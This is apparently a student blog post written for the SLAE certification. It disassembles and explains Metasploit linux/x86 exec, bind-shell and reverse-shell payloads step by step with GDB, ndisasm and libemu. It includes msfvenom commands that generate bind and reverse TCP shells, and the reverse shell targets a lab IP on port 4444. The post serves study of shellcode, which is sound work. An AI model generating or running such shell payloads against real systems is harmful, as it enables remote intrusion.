Assignment #5: Metasploit shellcode analysis
The fifth assignment for SLAE certification is about shellcode analysis and reversing.
The fifth assignment for SLAE certification is about shellcode analysis and reversing.
Students were asked to take up at least 3 shellcode samples created using Msfpayload for linux/x86, use GDB/Ndisasm/Libemu to dissect the funcSonality of the shellcode and presenting analysis.
The assignment was written on an Ubuntu Linux 18.04, with a Linux kernel 4.15 version.
To list all available payloads generated by msfvenom, you have to issue the following command:
From the list, I selected:
- bind TCP shellcode
- reverse TCP shellcode
GDB in action on linux/x86/exec payload
To see all possible options, the following command line can be used:
We need CMD parameter, that we can set to “/bin/sh”.
I copied the msfvenom output to a skeleton C program:
After compiling the program, I started it and breaking the execution to the line when control is passed to code bufer content.
Shellcode starts with the execve(2) system call number to be saved into the stack and than popped on EAX register
0x00402020 <+0>: push 0xb 0x00402022 <+2>: pop eax
Then we convert the double-word value in EAX into a quadword using the CDQ instruction. CDQ copies the sign (bit 31) of the value in the EAX register into every bit position in the EDX register.
0x00402023 <+3>: cdq
The registers just before the cdq instruction. As we can see EAX contains the execve call number as expected.
(gdb) info register eax 0xb 11 ecx 0x0 0 edx 0xb7fb7890 -1208256368 ebx 0x401fd4 4202452 (gdb)
After the cdq instruction, we can see edx is 0 (gdb) info register eax 0xb 11 ecx 0x0 0 edx 0x0 0 ebx 0x401fd4 4202452
So cdq can be a clever way to zero the EDX register not using the XOR technique, of course when we’re sure a positive number is stored into EAX.
We pushed EDX (that is zero) into the stack and then we pushed 0x632d (“-c”) on the stack, preparing for execve parameters.
After some more pushes, the stack situation is the one described in this screenshot.
Using python to decode the hex values stored, it’s easy to see it’s “/bin/sh -c”
We then move ESP value into EBX, preparing the second argument for execve(2) system call.
Right before the INT 0x80 that eventually it will execute the execve(), the situation is the one shown in this screenshot:
(gdb) info registers eax 0xb 11 ebx 0xbfffee3e -1073746370 ecx 0xbfffee2e -1073746386 edx 0x0 0 esp 0xbfffee2e 0xbfffee2e ebp 0xbfffee68 0xbfffee68
Let’s recall execve(2) prototype, as found in my Ubuntu system based on a 4.15 Linux kernel version.
#include <unistd.h> int execve(const char *filename, char *const argv, char *const envp);
Meanwhile EAX has execve(2) call number, EBX (execve first parameter) points to the following string:
(gdb) x/s $ebx 0xbfffee3e: “/bin/sh”
ECX, that is the second execve() parameter, points to a memory region containing the arguments for the program that is going to be executed:
(gdb) x/4xw $ecx 0xbfffee2e: 0xbfffee3e 0xbfffee46 0x0040203d 0x00000000 (gdb) x/s 0xbfffee3e 0xbfffee3e: “/bin/sh” (gdb) x/s 0xbfffee46 0xbfffee46: “-c” (gdb) x/s 0x0040203d 0x40203d <code+29>: “/bin/sh”
The “call” trick
The payload generated by msfvenom uses a clever trick to store the command to be executed into the stack.
When a CALL instruction is executed, the program passes the control to a given address storing into the stack the value right after the call itself, 0x0040203d in our case.
The bunch of bytes at this address are no more than “/bin/sh” string.
Back to our registers, EDX is NULL.
So when INT 0x80 it has been called, the following command will be executed “/bin/sh -c /bin/sh”.
Metasploit shellcode is built to be independent from the command the user asks, so a first shell is spawned with ‘-c’ argument that says the shell will execute the string passed as parameter value, “/bin/sh”, in our case.
ndisasm in action for linux/x86/shell_bind_tcp payload
With the following command we create a TCP BIND shellcode listening to port 4444 and we pass to ndisasm tool creating a disassembled output.
msfvenom -p linux/x86/shell_bind_tcp -a x86 –platform linux -f raw ndisasm -u - > bind_tcp.ndisasm
Let’s examine it syscall by syscall.
The first code is the following: EBX is set to zero, then EAX is set to zero too because of output of mul instruction.
Zero is stored into the stack, than EBX is incremented and the value 1 is stored into the stack and right after that the value 2 as well.
Stack is now something like this:
|-----| ESP --> | 2 | | 1 | | 0 | |-----|
ECX is pointing to this data structure and AL is filled with 0x66 that is 102 in decimal. The 102 value is the code for socketcall() systemcall.
socketcall() was used in Linux kernels as entrypoint for networking related APIs. In newer kernels, as you can see from my solutions for assignments 2 and 3, relevant socket APIs now have their own system call.
From the man page:
The first parameter, which is stored in EBX register, defines the API to call. EBX in this case contains the value 1, that is the socket() call.
So this snippet of code is calling the socket(2) system call, passing the parameters pointed by the ECX register (2, 1 and 0).
The socket(2) prototype says that 2, 1 and 0 are domain, type and protocol rispectively.
So, it’s like we’re asking the operating system to do this for us:
This means, “please, open us an IPv4 socket, using the TCP protocol that provides a sequenced, reliable, two-way, connection-based byte streams and for the protocol, please use the default one”.
The second syscall
The second system call invocation is:
Again this is a socketcall() invocation, because of a value of 0x66 in EAX register. EBX is set to 2, since it’s the first value popped out form stack. We’re than binding to a given port on a file descriptor, opened by socket(2) and stored in EDX register we save in the beginning on the stack.
We push a double word on the stack, 0x5c110002 that it can be splitted in two separated words:
- 0x5c11 that it is 4444 in decimal, the TCP port we have to bind to
- 0x2 that it is the AF_INET constant, used as af_inet
The 0x10 is than 16 bytes, the lenght of struct sockaddr_in data structure.
Calling the INT 0x80, we’re executing the following piece of C code:
The third syscall
The third call is pretty easy to understand. The EBX register is set to 4, that is the code for listen(2).
The listen(2) prototype is:
The fourth syscall
The fourth system call is just 3 lines of assembler.
We increment EBX that turns 5 and we invoke socketcall() again. This translates into calling accept() on the given socket descriptor.
The fifth syscall
After calling accept(), it has been called the dup2() system call since in EAX the value of 0x3f it has been stored.
The call is in a loop because we want to duplicate standard input, output and error that are mapped as file descriptors 0, 1 and 2.
The last call
The last call is the execve() that it will serve the incoming connection to port 4444.
First of all “/bin//sh” is stored into stack with the two push instructions.
Then the chain of argument for execve() is built, with pointers to memory region storing the command to be executed and then the lastest int 0x80 it has been called.
libemu in action on linux/x86/reverse_shell
We start creating a RAW shellcode for a TCP reverse shell shellcode.
msfvenom -p linux/x86/shell_reverse_tcp -f raw -a x86 –platform linux -o reverse_shell.raw
Using the raw shellcode, I’ll call sctest in order to analyze emulated output.
Just from bare sctest output, we can argue this shellcode is something related to networking. It tells a story about a socket, a connect somewhere, duplicating standard input, output and error on a file descriptor and then executing “/bin/sh”.
Let’s add a bit more of verbosity.
From the pseudo C code at the end of the output, we can see that a TCP socket it has been opened and the new file descriptor is used to duplicate standard input, output and error.
Then a connect on port 4444 for IP address 172.16.202.164, that it is the address of my Linux VirtualBox machine and a final execve called on /bin/sh on the connected socket.
What I’ve learnt
I have to admit, other assignments are more exciting because of some coding to do. However, reversing code is interesting because you can learn some clever coding techniques.
On those specific analysis, the most interesting techniques I’ve learnt are:
- using cdq instruction, after setting EAX register to a positive value, to init EDX to zero
- the CALL used to jump in the middle of a shellcode so the ESP can point to “/bin/sh” string
SLAE Exam Statement
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-1217